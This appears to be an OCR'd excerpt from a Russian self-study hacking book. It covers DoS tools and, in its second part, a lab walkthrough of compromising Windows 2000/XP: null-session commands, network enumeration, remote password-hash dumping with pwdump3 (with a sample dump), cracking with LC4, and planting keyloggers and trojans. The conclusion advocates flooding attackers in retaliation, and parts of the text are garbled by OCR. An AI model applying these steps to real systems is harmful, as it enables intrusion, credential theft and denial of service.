Атаки на истощение ресурсовАтака DoS, направленная на истощение ресурсов, имеет своей целью захват сис-темных ресурсов атакованного хоста, таких как память, процессор, квоты диско-вого пространства. Как правило, хакер, предпринимающий данную атаку DoS,уже имеет доступ к общим ресурсам системы и своими действиями пытаетсязахватить дополнительные ресурсы, чтобы затруднить доступ к ним другихпользователей. Эти действия могут привести к недоступности сервера для под-ключений остальных пользователей, зависанию процессов и переполнению дис-кового пространства.

Одна из наиболее интересных и эффективных атак DoS рассматриваемого типареализуется программой PortFuck, которая выполняет атаку переполнением таб-лицы процессов (еще ее называют флудером TCP-соединений по причинам, ко-торые изложены далее). Утилита PortFuck открывает с хостом-жертвой все но-вые и новые TCP-соединения до тех пор, пока не переполнит ресурсы атакован-ного компьютера. Этот момент наступит независимо от мощности процессора,размера памяти, полосы пропускания линии связи и любых других факторов потой простой причине, что каждое TCP-соединение требует для открытия ресурсы,а они, в любом случае, не беспредельны.

На Рис. 9.5 представлен главный диалог утилиты PortFuck.

!.f: PortFuck 1.0Ь2 PRIVATE BUILD НШЮ|

Host:

Port:

localhost ] START

П Reconnect on Disconnect | Help?

Delay (MS): |1 000 | PANICI

[Ready. Socks: [5 |

Puc. 9.5. Программа PortFuck готова сокрушить свою жертву

149

Page 150: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Атаки Nuke

Слово «Nuke» на английском языке означает «ядерное оружие», и если такоеназвание присвоили атакам DoS, то, очевидно, они чего-то, стоят. На русскомэти атаки так и называют — «нюк», и суть классического «нюка» состоит в сле-дующем. В сетях TCP/IP для проверки функционирования хостов применяетсяпротокол ICMP, про который мы упоминали в разделе «Флудер ICMP» выше.При возникновении в сети какой-либо ошибки функционирования — обрывасоединения, недоступности линии связи и т.п. — происходит генерация сообще-ния ICMP, вслед за которым выполняются определенные действия, например,перестройка маршрутизации сети исключением линии связи из таблицы мар-шрутизации. Одновременно разрываются все подключения с компьютером,ставшим недоступным.

На этом-то и строится расчет хакера — послав компьютеру А, подключенному ккомпьютеру В, сообщение, что компьютер В якобы недоступен, можно прерватьсоединение. Наибольший эффект такие «шалости» имеют при атаках на ШС иWeb-чаты, поскольку их посетители подолгу остаются подключенными к серве-ру, и их легко вычислить и «отсоединить» от сервера. Так что атаки Nuke — этосущее наказание для сетей ШС.

При работе с атаками DoS типа Nuke и хакерам, и антихакерам следует учесть,что системы Windows 2000/XP не позволяют вытворять с собой такие штучки,которые без проблем выводят из строя системы Windows 9x. Это подтверждаюткак эксперименты по применению «нюков» к компьютерам Windows 2000/XP,так и литературные источники (например, [4]). Тем не менее, учитывая наличиев Интернете множества компьютеров Windows 9x, да еще и лишенных всякойзащиты брандмауэрами, не стоит сбрасывать со счетов возможности «нюков».Для антихакеров «нюки» подчас могут стать той дубиной, которая спасет ихпри путешествиях по виртуальным просторам Интернета от персонажей типадоктора Добрянского.

Существует великое множество утилит для выполнения атак Nuke — все на од-но лицо, с очень похожими диалогами. Рабочее окно одной из них, программыWindows Nuke’eM version 1.1, представлено на Рис. 9.8.

Чтобы выполнить атаку Nuke на компьютеры нашей экспериментальной ло-кальной сети, добавим к ней еще одного клиента — Alex-2, с IP-адресом 1.0.0.4 иработающего под управлением системы Windows 95. Далее выполним такие шаги.

>• В поле Address (Адрес) рабочего окна программы Windows Nuke’eM version 1.1,представленном на Рис. 9.8, последовательно введите IP-адреса компьютеровAlex-2 (Windows 95), Alex-3 (Windows XP) и Alex-1 (Windows 2000). По мереввода ГР-адресов щелчком на кнопке Add (Добавить) вносите их в список влевой части диалога.

152

Page 151: Самоучитель хакера подробное иилюстрированное руководство

Атаки DoS

Address [1.0,0,7 \»\ Eort [щ

1.0.0.41.0.0.51.0.0.7

lext [Testing 1 2 3

| Add | |Remove! | Help

JDelay ft [- П dose after execulio

This program is created by Sadikuz (c) fortest-purposes only. The author of thisprogramis not responsible for any misbehaviour by

I

Execute

Dong

Puc. 9.8. Рабочее окно классического «Нюка» весьма незамысловато

> Щелкните на кнопке Execute (Исполнить). В окне Windows Nuke’eM version 1.1отобразится информация о ходе атаки (Рис. 9.9).

Windows Nuke’eM — Version 1 . 1

Rle Help

Address |1. 0.0.7

1.0.0.41.0.0.51.0.0.7

{Nuked}{Connect error}{Connect error}

lexl |Testing 1 2 3

НИЖЗэЕ

MEot|l39 К]

I

Delay |o | Q Close after execution

This program is created by Sadikuz (c) fortest-purposes only. The author of thisprogramis not responsible for any misbehaviour by

| Add | | Remove | | Help | 1

| Execute

I

I

Unable to connect to: 1 .0.0.7

Puc. 9.9. На компьютере Alex-2 следует ожидать неприятностей!

> Чтобы проверить результаты применения «нюка» к компьютеру Alex-2, по-пробуем обратиться к компьютеру А1ех-2 с помощью проводника Windows.В ответ проводник Windows отображает диалог, представленный на Рис. 9.10.

Таким образом, связь с компьютером А1ех-2 нарушена — что и требовалось дос-тичь атакой Nuke. Теперь вы понимаете, почему при общении в чатах и всякогорода IRC-сообществах следует избегать идентификации вашего IP-адреса. Ведьпри работе на компьютерах со старыми системами Windows вы практически ни-чем не защищены от «нкжов», если, конечно, не используете толковый бранд-мауэр или систему IDS (рекомендуем BlacklCE Defender).

153

Page 152: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

• Замедление скорости передачи данных — посылая якобы от имени промежу-точного маршрутизатора ICMP-сообщение Source Quench (Замедлить источ-ник), хакер принуждает хост снизить скорость передачи данных. Этого же ре-зультата можно достичь, посылая ICMP-сообщение Destination Unreachable:Datagram Too Big (Цель недоступна: датаграмма слишком велика).

Как видим, возможности протокола ICMP для создания атак DoS просто неис-черпаемы, однако следует учесть, что владея такой техникой, хакер может полу-чить гораздо больше пользы, если применит ее для достижения других, болееплодотворных целей, чем для причинения мелких и средних гадостей своимсетевым соседям.

Напоследок укажем самую, пожалуй, популярную атаку DoS, реализованную всетях TCP/IP — атаку на протокол NetBIOS от хакера Sir Dystic, создавшего утили-ту nbname, которая искажает работу службы NBNS преобразования IP-адресов вимена NetBIOS в сетях Windows 2000 [4]. Запустив утилиту nbname, можно пол-ностью нарушить работу всей сети, передавая сообщения NetBIOS об освобож-дении или регистрации имен NetBIOS. После этого работа сети TCP/IP полно-стью или частично нарушается — общие ресурсы становятся недоступными, под-ключения и просмотр сетевых соседей затрудняется, и перестают работать неко-торые команды тестирования сети, например, net send.

К сожалению, все попытки обнаружить в Интернете утилиту nbname оказалисьтщетными — сайты, указанные ссылками на страницах с описанием атаки утили-той nbname, тщательно заглушены, что наводит на мысль об исключительнойэффективности nbname.

Зашита от атакАтаки DoS — это бедствие нынешнего виртуального мира, приводящие в хаосмощные вычислительные системы. Борьба с ними усложняется еще и тем, чтовсе эти атаки подчас невозможно отразить иначе, кроме как закрытием всех се-тевых соединений атакованного хоста, что очень часто неприемлемо по финан-совым соображениям. Тем не менее, в [11] отмечается, что иногда выгоднее уве-личить мощности компьютерной системы, подверженной атакам DoS, чем за-крыть к ней доступ, скажем, остановить работу Web-сервера организации.Расчет здесь строится на истощение ресурсов атакующей стороны, которой про-сто не удастся превзойти ресурсы Web-сервера. Другое важное средство защи-ты — переход на современные операционные системы и программное обеспече-ние, которое «осведомлено» о последних изобретениях по части атак DoS.

Однако все это может не устоять перед атакой DDoS — хакер, овладевший таки-ми средствами, может стать воистину всемогущим, поскольку нет такого серве-ра, который мог бы устоять перед атакой, идущей со всех сторон земного шара с

156

Page 153: Самоучитель хакера подробное иилюстрированное руководство

Атаки DoS

неопределенно большого числа комьютеров-зомби. Такие атаки требуют особо-го подхода, и вот что предлагает компания Foundstone.

Вместо настройки системы защиты сервера, усиления ресурсов подверженногоатакам компьютера, т.е. всего того, что в Главе 1 мы назвали «пассивная оборо-на», специалисты Foundstone предлагают меры активной обороны. В ответ наатаку DDoS, использующей сотни и тысячи «зомби», Foundstone предлагает са-мому перейти в наступление и заглушить работу «зомби» встречной атакой.

Для выполнения такой контратаки сотрудник фирмы Foundstone, неутомимыйРобин Кейр (Robin Keir), разработал и предоставил всем желающим возможностьзагрузить на сайте http://www.foundstone.com бесплатную утилиту DDoSPing 2.0,которая выполняет тестирование компьютера на предмет наличия в нем програм-мы-зомби. Далее работу выявленного зомби можно заглушить, воспользовавшисьпрограммой флудера UDP, описанного в разделе «Флудер UDP» выше.

На Рис. 9.11 представлен диалог программы DDosPing 2.0, содержащий все не-обходимые элементы для выполнения тестирования.

-Target IP address range —

Start IP address |1.Q.Q.5|

End IP address h.OO 5 Slop

-Transmission speed control-

Speed (pkts/sec)

I 181 I -o-Modem—>-Cable—>—T1 —>—LAN

-Infected Hosts-

Program started: Sun Febl613:50:48 2003Waiting 6 seconds for final results…Program stopped: Sun Feb1613:50:54 2003

— Status -Current IPPackets sentTime elapsedZombies detected

1.0.0.5300:00:000

Save List

Configuration

ne /лс, Affp://i

Рис. 9.11. Диалог программы выявления зомби DDoSпозволяет тестировать целую сеть

Для работы с программой DDoSPing 2.0 следует выполнить такие шаги.

> В поля Start IP address (Начальный IP-адрес) и End IP-address (КонечныйГР-адрес) введите начальный и конечный IP-адреса тестируемой сети или от-дельного хоста.

157

Page 154: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

>• Установите ползунок Speed (Скорость) в позицию, соответствующую тести-руемой сети, в данном случае LAN.

>• Если необходимо, щелкните на кнопке Configuration (Конфигурация) и от-кройте диалог настройки программы Рис. 9.12).

В Enable

Send to UDP port

«Ping» command

Expected reply

0 Enable

SendlCMPID

«Ping» commend

Expected reply

0 Enable

SendlCMPID

«Ping» command

| Windows defaults UNIX defaults

[34555 | Listen on UDP port |355Б5 |

|pngQ..KsH4

(PONG

Ii

[668 | P^ceivelCMPID [б69 |

Jgesundheit!

|sicken\nII

[?89 | Receive ICMP ID [Ш |

i— ~ •»»»»

П Show UDP transmit errors

Max run duration (sees) [O I (Q«forev@r)

Transmit each packet

After scon ends, wait

1 times

sees for final rep

I

Cancel

| OK

lies ‘

Рис. 9.12. Настройка программы тестирования

> В зависимости от тестируемой системы, щелкните на кнопке Windows defaults(Windows по умолчанию) или Unix defaults (Unix по умолчанию), чтобы ус-тановить стандартные параметры проверки систем Windows или Unix, соот-ветственно.

>• Обратите внимание, что программа DDoSPing 2.0 позволяет выявлять зом-би, принимающие участие не только в атаках WinTrinoo, но и других, неменее интересных атаках того же рода — StachelDraht и Tribe Flood Net-work. Если настройки программы вас устраивают, щелкните на кнопке ОКв диалоге настройки программы (Рис. 9.12).

> В диалоге DDoSPing 2.0 на Рис. 9.11 щелкните на кнопке Start (Пуск) и вы-полните тестирование. Ход проверки отображается в поле Infected Hosts (За-раженные хосты).

Другой, не менее популярной утилитой для выявления компьютеров-зомбиявляется программа Zombie Zapper (http://razor.bindview.com/tools/ZombieZapper__form.shtml), которая как раз и является творцом атаки WinTrinoo.На Рис. 9.13 представлен диалог этой программы, который, как видим, не оченьотличается от DDoSPing 2.O.

158

Page 155: Самоучитель хакера подробное иилюстрированное руководство

Атаки DoS

Target(s) 0 Specify single IP or class С subnet —|

Target IP:

| input IMs…

0 Trinoo UDP source |53

0 Trinoo for Windows

0TFN

0 Sta.chelDroht

QShatt-myfloodedhost: |

[ T o I Repeats (1-300)

Zap Exit

Puc. 9.13. Программа Zombie Zapper также неплоха

Однако в отличие от DDoSPing 2.0, программа Zombie Zapper не позволяет вы-полнять настройку тестирования хостов и не снабжена такими удобными сред-ствами наблюдения за ходом проверки, как DDoSPing 2.O.

ЗаключениеКак вы, наверное, уже поняли, атаки DoS — это занятие не для Хакеров с боль-шой буквы, а скорее для типов, наподобие упомянутого в Главе 1 доктора Доб-рянского. В самом деле, что толку оттого, что где-то за океаном, за тридевятьземель, у кого-то перестанет работать Web-сервер и этот кто-то понесет потери.Вам-то что с того, если только, надеюсь, вы не кибертеррорист и не личность с«обугленным черепом и клочками растительности, и обрывками проводов», каку доктора Добрянского. Но вот для Антихакера атаки DoS иногда могут статьпросто спасением, если попытки остановить атаки какого-нибудь «кул хацкЁра»

(да-да, именно «Ё», уже и такие появились) не получаются никаким образом и нетуже сил и средств на непрерывное наращивание мощностей Web-сервера. ВыявитеIP-адрес такого «хацкЁра» и затопите его компьютер пакетами ICMP-флудера!Системы EDS всегда готовы предоставить DP-адрес, требуемый для такой контр-атаки, а простые флудеры, подобные описанным в этой главе, можно найти намногих сайтах Web. Однако помните, что такие методы защиты — на грани до-пустимого, и их использование чревато. Поэтому антихакер должен применятьобоюдоострое оружие атак DoS весьма умело, действуя через прокси-сервер иприкрываясь брандмауэром — а то ведь и ответить могут!

159

Page 156: Самоучитель хакера подробное иилюстрированное руководство

Г Л А В А 10.

Хэкииг компьютеров Windows ZOOO/XfИтак, хакеру удалось подсоединиться к локальной сети, воспользовавшись ка-ким-то заброшенным (чужим) компьютером, или нелегально подсоединиться ксетевому кабелю, проходящему где-то в подвале, применив специальное устрой-ство (подробнее о таких приспособлениях вы можете прочитать, например, в [1]).Впрочем, все это, как правило, излишне — при царящем в нынешних локальныхсетях хаосе достаточно получить доступ к обычному сетевому компьютеру — идалее все зависит от вас. Итак, хакер получил доступ к локальной сети и теперьхочет получить доступ к информационным ресурсам сетевых хостов. Как же онможет это сделать?

Далее работа утилит хакинга иллюстрируется на примере нашейэкспериментальной сети TCP/IP, которую мы использовали на про-тяжении всей книги. Эта сеть позволит продемонстрировать на-бор технических приемов хакинга сетей TCP/IP без нарушения чьих-либо прав на конфиденциальность информации. Автор категориче-ски настаивает на неприменении описанных далее средств к реаль-ным сетям и предупреждает о возможной ответственности.

В Главе 1 мы описали все этапы хакерского нападения и указывали, что хакервначале попытается узнать все что только можно об организации атакуемой сетии применяемых в ней сетевых технологиях. В этой главе мы опустим этап пред-варительного сбора данных — он достаточно подробно описан, например, в [11].Вместо этого мы поподробнее рассмотрим все последующие этапы сетевой ата-ки, которые, собственно, и делают хакинг таким «интересным» занятием. Какуказывалось в Главе 1, первое, что должен сделать хакер для проникновения всеть — это выполнить ее сканирование и инвентаризацию.

Сканирование cemu*TCf/lfСканирование преследует цель определение IP-адресов хостов атакуемой сети, идля выполнения сканирования можно воспользоваться утилитой ping из наборасредств, представленных в пакете W2RK (Windows 2000 Resource Pack).Эта утилита посылает сетевым хостам с ГР-адресами в заданном диапазоне паке-ты протокола ICMP (Internet Control Message Protocol — Протокол управляющихсообщений в сети Интернет). Если в ответ на посланный пакет приходит ответ -значит по соответствующему адресу находится сетевой хост. На Рис. 10.1 пред-ставлен результат сканирования утилитой ping хоста Sword-2000.

Page 157: Самоучитель хакера подробное иилюстрированное руководство

Хакинг компьютеров Windows 2000/XP

с \ Command Prompt

Pinging 1.Q.O.I with 32 bytes of data:

Reply fron 1.0.0.1: bytes=32 tine<lns TIL=128Reply fron 1.0.0.1: bytes=32 tine<lns TTL=128Reply fron 1.0.0.1: bytes=32 time<lns TTL=128Reply fron 1.0.0.1: bytes=32 time<lns TTL-128

Ping statistics for 1.0.0.1:Packets: Sent = 4, Received » 4, Lost = 0 «3x loss),

ftpproxinate round trip times in nilli-seconds:Mininun = Qns, tlaxinun = Ons, flverage = Ons

Puc. 10.1. Результат сканирования хоста Sword-2000утилитой ping

Из результата видно, что компьютер по указанному адресу подключен к сети исоединение работает нормально. Это самый простой способ сканирования сети,однако, он не всегда приводит к нужным результатам, поскольку многие узлыблокируют ответную отправку пакетов ICMP с помощью специальных средствзащиты. Если обмен данными по протоколу ICMP заблокирован, хакерами мо-гут быть использованы другие утилиты, например, hping (http://www.hping.org/).Эта утилита способна фрагментировать (т.е. делить на фрагменты) пакеты ICMP,что позволяет обходить простые устройства блокирования доступа, которые неумеют делать обратную сборку фрагментированных пакетов.

Resolved |SWORD-20]0

П Resolve hostnames

0 Only scan responsrve ping

0 Show host responses

О Ping only

О Every port in list

О All selected ports in list

© All list ports from

О All ports from

0 Ignore IP zero

0 Ignore IP 255

П Extract from file

•M Active ho

Open ports

Puc. 10.2. Результаты сканирования сети утилитой SuperScan 3.0

1616 — 5830

Page 158: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Другой способ обхода блокирования доступа — сканирование с помощью утилит,позволяющих определить открытые порты компьютера, что в ряде случаев спо-собно обмануть простые системы защиты [3]. Примером такой утилиты являетсяSuperScan (http://www.foundstone.com), которая предоставляет пользователямудобный графический интерфейс (см. Рис. 10.2).

На Рис. 10.2 приведен результат сканирования сети в диапазоне IP-адресов1.0.0.1-1.0.0.7. Обратите внимание на древовидный список в нижней части окна,отображающий список всех открытых портов компьютера Sword-2000, средикоторых — любимый хакерами TCP-порт 139 сеансов NetBIOS. Запомнив это,перейдем к более детальному исследованию сети — к ее инвентаризации.

Инвентаризация сетиИнвентаризация сети заключается в определении общих сетевых ресурсов, учет-ных записей пользователей и групп, а также в выявлении приложений, исполняе-мых на сетевых хостах. При этом хакеры очень часто используют следующий не-достаток компьютеров Windows NT/2000/XP — возможность создания нулевогосеанса NetBIOS с портом 139.

Иуле&ой сеансНулевой сеанс используется для передачи некоторых сведений о компьютерахWindows NT/2000, необходимых для функционирования сети. Создание нулевогосеанса не требует выполнения процедуры аутентификации соединения. Для созда-ния нулевого сеанса связи выполните из командной строки Windows NT/2000/XPследующую команду.

net use\\1.0.0.1\IPC$ «» /user: «»

Здесь 1.0.0.1 — это IP-адрес атакуемого компьютера Sword-2000, IPC$ — этоаббревиатура Inter-Process Communication — Межпроцессное взаимодействие(название общего ресурса сети), первая пара кавычек «» означает использованиепустого пароля, а вторая пара в записи /user:»» указывает на пустое имя удален-ного клиента. Подключившийся по нулевому сеансу анонимный пользовательпо умолчанию получает возможность запускать диспетчер пользователей, при-меняемый для просмотра пользователей и групп, исполнять программу про-смотра журнала событий. Ему также доступны и другие программы удаленногоадминистрирования системой, опирающиеся на протокол SMB (Server MessageBlock — Блок сообщений сервера). Более того, подсоединившийся по нулевомусеансу пользователь имеет права на просмотр и модификацию отдельных разде-лов системного реестра.

162

Page 159: Самоучитель хакера подробное иилюстрированное руководство

Хакинг компьютеров Windows 2000/XP

В ответ на ввод вышеприведенной команды, не защищенный должным образомкомпьютер отобразит сообщение об успешном подключении; в противном случаеотобразится сообщение об отказе в доступе. В нашем случае появится сообщениеоб успешном выполнении соединения компьютера Alex-З (система Windows XP)с компьютером Sword-2000 (система Windows 2000). Однако нулевой сеансSword-2000 с Alex-З уже не получается — очевидно, разработчики Windows XPучли печальный опыт «использования» нулевого сеанса в системах Windows 2000,которые, по умолчанию, позволяли нулевые сеансы.

Нулевые сеансы связи используются всеми утилитами инвентаризации сетевыхресурсов компьютеров Windows NT/2000/XP. Самый простой метод инвентари-зации состоит в использовании утилит net view и nbtstat из пакета W2RK. Утили-та net view позволяет отобразить список доменов сети.

C:\>net view /domainДомен

SWORDКоманда выполнена успешно.

В результате отобразилось название рабочей группы SWORD. Если указать най-денное имя домена, утилита отобразит подсоединенные к нему компьютеры.

C:\>net view /domain:SWORDИмя сервера Заметки

\\ALEX-3\\SWORD-2000Команда выполнена успешно.

А теперь определим зарегистрировавшегося на данный момент пользователя сер-верного компьютера Sword-2000 и запущенные на компьютере службы. С этойцелью применим утилиту nbtstat; результат ее применения представлен на Рис. 10.3.

На Рис. 10.3 отображена таблица, в которой первый столбец указывает имяNetBIOS, вслед за именем отображен код службы NetBIOS. В частности, код<00> после имени компьютера означает службу рабочей станции, а код <00>после имени домена — имя домена. Код <03> означает службу рассылки сообще-ний, передаваемых вошедшему в систему пользователю, имя которого стоитперед кодом <03> — в данном случае, Administrator. На компьютере также за-пущена служба браузера MSBROWSE, на что указывает код <1 Е> после именирабочей группы SWORD.

163

Page 160: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Command Prompt

C:4Documents and SettingsSfllex>nbtstat -Я 1.Ш.0.1

Node Ipflddress: [1.0.0.5] Scope Id: U

NetBIOS Remote Machine Nane Table

SllORD-2000 <00> UNIQUE RegisteredSUORD-2000 <20> UNIQUE RegisteredSUORD <Q0> GROUP RegisteredSWORD <1C> GROUP RegisteredSWORD <1B> UNIQUE RegisteredSWORD <1E> GROUP RegisteredSUORD-2000 <03> U N I Q U E RegisteredSUORD <1D> U N I Q U E Registered

MSBROWSE <01> GROUP RegisteredINet~Seruices <1C> GROUP RegisteredIS~SWORD-2Q00..<00> U N I Q U E RegisteredADMINISTRATOR <03> UNIQUE Registered

МЙС flddress — S2-54-AB-14-5S-B4

Puc. 10.3. Утилита nbtstat определила пользователейи службы компьютера Alex-3

Итак, у нас уже имеется имя пользователя, зарегистрированного в данный мо-мент на компьютере — Administrator. Какие же общие сетевые ресурсы компью-тера Sword-2000 он использует? Снова обратимся к процедуре net view, указавей имя удаленного компьютера. Результаты представлены на Рис. 10.4.

C:\Document; id Settings\fllex>nbtst

Sviord:Node Ipflddress: 11.Ш.0.5] Scope Id: I I

NetBIOS Remote Machine Nane Table

SUORD-20QQSUORD-2Q00SUORDSUORDSUORDSUORDSWORD-20QGISUORD

MSBROUSE_INef»SeruicesIS-SUORD-2000.flDMINISlllfllOR

RegisteredRegisteredRegisteredRegisteredRegisteredRegisteredRegistereRegistereiRegisteredRegistered

52-54-flB-14-S5-B4

Puc. 10.4. Общие ресурсы компьютера Sword-2000

Как видим, учетная запись пользователя Administrator открывает общий сетевойдоступ к некоторым папкам файловой системе компьютера Sword-2000 и диско-воду CD-ROM. Таким образом, мы уже знаем о компьютере достаточно много — онразрешает нулевые сеансы NetBIOS, на нем работает пользователь Administrator,открыты порты 7, 9, 13, 17, 139, 443, 1025, 1027 компьютера, и в число общесе-тевых ресурсов входят отдельные папки локального диска С:. Теперь осталосьтолько узнать пароль доступа пользователя Administrator — и в нашем распоря-жении будет вся информация на жестком диске С: компьютера. Чуть ниже мы

164

Page 161: Самоучитель хакера подробное иилюстрированное руководство

Хакинг компьютеров Windows 2000/XP

покажем, как для этого используется утилита pwdump3.exe удаленного извлече-ния паролей из системного реестра Windows NT/2000/XP и программа LC4 ихдешифрования.

А что можно сделать, если протокол NetBIOS через TCP/IP будет отключен(компьютеры Windows 2000/XP предоставляют такую возможность)? Сущест-вуют и другие средства инвентаризации, например, протокол SNMP (SimpleNetwork Management Protocol — Простой протокол сетевого управления), обеспе-чивающий мониторинг сетей Windows NT/2000/XP. Атаки, основанные на уяз-вимостях SNMP, описаны, например, в [11].

А сейчас, после того, как мы собрали сведения об атакуемой системе, перейдемк ее взлому.

Реализация целиИсполнение атаки на системы Windows NT/2000/XP состоит из следующих этапов.

• Проникновение в систему, заключающееся в получении доступа.

• Расширение прав доступа, состоящее во взломе паролей учетных записей сбольшими правами, например, администратора системы.

• Выполнение цели атаки — извлечение данных, разрушение информации и т.д.

Проникновение Ъ систему

Проникновение в систему начинается с использования учетной записи, выяв-ленной на предыдущем этапе инвентаризации. Для определения нужной учет-ной записи хакер мог воспользоваться командой nbtstat или браузером MIB,или какими-либо хакерскими утилитами, в изобилии представленными в Интер-нете (см. целый перечень в [3] или в [4]). Выявив учетную запись, хакер можетпопробовать подсоединится к атакуемому компьютеру, используя ее для вход-ной аутентификации. Он может сделать это из командной строки, введя такуюкоманду.

D:\>net use \\1.0.0.1\1РС$ * /u:Administrator

Символ «*» в строке команды указывает, что для подключения к удаленномуресурсу IPC$ нужно ввести пароль для учетной записи Administrator. В ответ наввод команды отобразится сообщение:

Type password for \\1.0.0.1\IPC$:

Ввод корректного пароля приводит к установлению авторизованного подключе-ния. Таким образом, мы получаем инструмент для подбора паролей входа вкомпьютер — генерируя случайные комбинации символов или перебирая содер-

165

Page 162: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

жимое словарей, можно, в конце концов, натолкнуться на нужное сочетаниесимволов пароля. Для упрощения подбора существуют утилиты, которые авто-матически делают все эти операции, например, SMBGrind, входящая в коммер-ческий пакет CyberCop Scanner компании Network Associates. Еще один метод -создание пакетного файла с циклическим перебором паролей (пример такогофайла можно найти в [3]).

Однако удаленный подбор паролей — далеко не самое мощное орудие взлома.Все современные серверы, как правило, снабжены защитой от многократных по-пыток входа со сменой пароля, интерпретируя их как атаку на сервер. Для взломасистемы защиты Windows NT/2000/XP чаще используется более мощное средст-во, состоящее в извлечении паролей базы данных SAM (Security Account Man-ager — Диспетчер учетных данных системы защиты). База данных SAM содержитшифрованные (или, как говорят, хешированные) коды паролей учетных записей,и они могут быть извлечены, в том числе удаленно, с помощью специальныхутилит. Далее эти пароли дешифруются с помощью утилиты дешифрования,использующей какой-либо метод взлома, например, «грубой силой», либо сло-варной атакой, путем перебора слов из словаря.

Наиболее известной утилитой дешифрования, применяемой для взлома паролейSAM, является программа LC4 (сокращение от названия LOphtcrack, новейшаяверсия — LC4) (http://www.atstake.com/research/redirect.html), которая дейст-вует в паре с такими утилитами.

• Samdump — извлечение хешированных паролей из базы данных SAM.

• Pwdump — извлечение хешированных паролей из системного реестра ком-пьютера, включая удаленные системы. Эта утилита не поддерживает усилен-ное шифрование Syskey базы SAM (подробнее о Syskey см. Главу 2).

• Pwdump2 — извлечение хешированных паролей из системного реестра, в ко-тором применено шифрование Syskey. Эта утилита поддерживает работутолько с локальными системами.

• Pwdump3 — то же, что и Pwdump2, но с поддержкой удаленных систем.

Что такое шифрование Syskey, мы подробно обсудили в Главе 2; здесь укажем,что это средство усиленного шифрования базы SAM, которое устанавливается всистемах Windows 2000/XP по умолчанию, а для систем Windows NT должнобыть установлено как дополнительная возможность.

В Главе 2 было описано, как следует извлекать пароли из локального системно-го реестра, сейчас же рассмотрим, как эта операция выполняется удаленно.Для извлечения хешированных паролей из компьютера Sword-2000 применимутилиту PwdimpS, запустив ее из командной строки:

C:\>pwdump3 sword-2000 > password.psw

166

Page 163: Самоучитель хакера подробное иилюстрированное руководство

Хакинг компьютеров Windows 2000/XP

Здесь в командной строке указан целевой компьютер Sword-2000, а далее заданоперенаправление вывода извлеченных данных в файл с именем password.psw.Содержимое полученного в результате файла представлено в окне приложенияБлокнот (Notepad) (Рис. 10.5).

sword.psw — Notepad

File Edit Format Help

\dministator: SOO:7A01665EB2£B6C14AAD3B435B51404EE:OB0412D8761239A73143EFAE928E9FOA:::Guest:501 :NO PASSWORD*»‘ :NO PASSWORD * :::krbtgt:S02:NO PASSWORD ‘ :7BD70B6AF1C3909E006426SFE207B256:::Alex:1110:7A01665EB2EB6C14MD3B43SB51404EE:OB0412D8761239A73143EFAE92eE9FOA;::Alex-1:1113:7A01665EB2EB6C1<tAAD3B<!35BSl404EE:OB0412D6761239A73143EFAE92SE9FOA:::TslnternelUssr: 1114:BAD7DFC9A31GED47F7B4B3B5S224FE93:C 7BD9SEOEBB6 EFS1ЗЕЕА6Л46С4475CFO:::USR_SWORD-2000:inS:3C28F57EAAF6DF9E1A6F22062Ali83BE:6FDDA84130F3FOS7F762F24l4IM

B235686:::WAM SWORD-2000:1116:ED30C29CC83326F4A5CF20S94A603490:CA9469SBOCF3440C09302SC И!B028B6E2C:::SWORD.2000J:100S:NO’AS5WORD»»»»»»»—»»:3942CE20E6A112963BAeF7DC9BC34D07:::

ALEX-3$:1109:NO PASSWORD»» «»»»»»:B6B19C13A34F6BD42S4C0199ES1F12A6:::ALEX-1$:1112:NO PASSWORD'»» » :B7D4SA21709B0869751E609477D7266F:::

Puc. 10.5. Результат извлечения хешированных паролейиз компьютера Sword-2000

Как видим, в файле password.psw содержится учетная запись Administrator,которую мы нашли на этапе инвентаризации. Чтобы расшифровать пароли, сле-дует применить программу LC4, и, хотя пробная версия этой программы под-держивает только дешифрование паролей методом словарной атаки, мы все жесможем взломать пароли компьютера Sword-2000 (Рис. 10.6).

AdministratorGuestkrbtgtAlexAlex-1TslnternetUserIUSR_SWORD-2.IWAM_SWORD-2.SWORD-2000SALEX-3SALEX-IS

missing* missing ** missing *

Dictionary 1 of! l\\Alex-3X5)stake\LC4\words-enqlish.dic]

Puc. 10.6. Дешифрование паролей,удаленно извлеченных из реестра компьютера Sword-2000

Для этого потребовалось всего несколько секунд работы компьютера с процес-сором Celeron 1000 МГц, поскольку пароль 007 состоит всего из трех цифр иочень слаб. Применение более сложных паролей значительно повышает крипто-

167

Page 164: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

стойкость системы, и их взлом может потребовать неприемлемого увеличениявремени работы приложения LC4.

Таким образом, хакер, имея одну небольшую зацепку — возможность созданиянулевых сеансов подключения NetBIOS к компьютеру — в принципе, сможет по-лучить пароли учетных записей компьютера, включая администратора системы.Если же ему не удастся сразу получить пароль учетной записи с большими пра-вами, хакер постарается расширить свои права доступа.

Расширение прав доступа и реализация атакиДля расширения прав доступа к системе взломщики используют самые разнооб-разные методы, но основное их отличие — необходимость внедрения в компью-тер специальной программы, позволяющей выполнять удаленное управлениесистемой, в том числе регистрацию действий пользователя. Цель — овладениеучетной записью, позволяющей получить максимально широкий доступ к ре-сурсам компьютера. Для этого на атакуемый компьютер могут быть внедренытак называемые клавиатурные шпионы — программы, регистрирующие нажатияклавиш. Все полученные данные записываются в отдельный файл, который да-лее может быть отослан на компьютер взломщика по сети.

В качестве примера клавиатурного шпиона можно назвать популярный регист-ратор Invisible Key Logger Stealth (IKS) (http://www.amecisco.com/iksnt.htm),который был описан в Главе 3 этой книги. Кейлоггер IKS — пример пассивноготрояна, который работает сам по себе и не обеспечивает своему хозяину средствудаленного управления.

Другой вариант действий хакера — помещение в систему активного трояна, т.е.,например, популярного троянского коня NetBus (http://www.netbus.org) илиВО2К (Back Orifice 2000) (http://www.bo2k.com), которые обеспечивают средстваскрытого удаленного управления и мониторинга за атакованным компьютером.

